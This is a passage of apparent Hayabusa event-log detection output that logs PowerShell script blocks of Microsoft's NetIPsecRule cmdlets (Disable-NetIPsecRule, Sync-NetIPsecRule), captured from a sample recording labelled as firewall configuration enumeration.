$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,", ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAsso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and 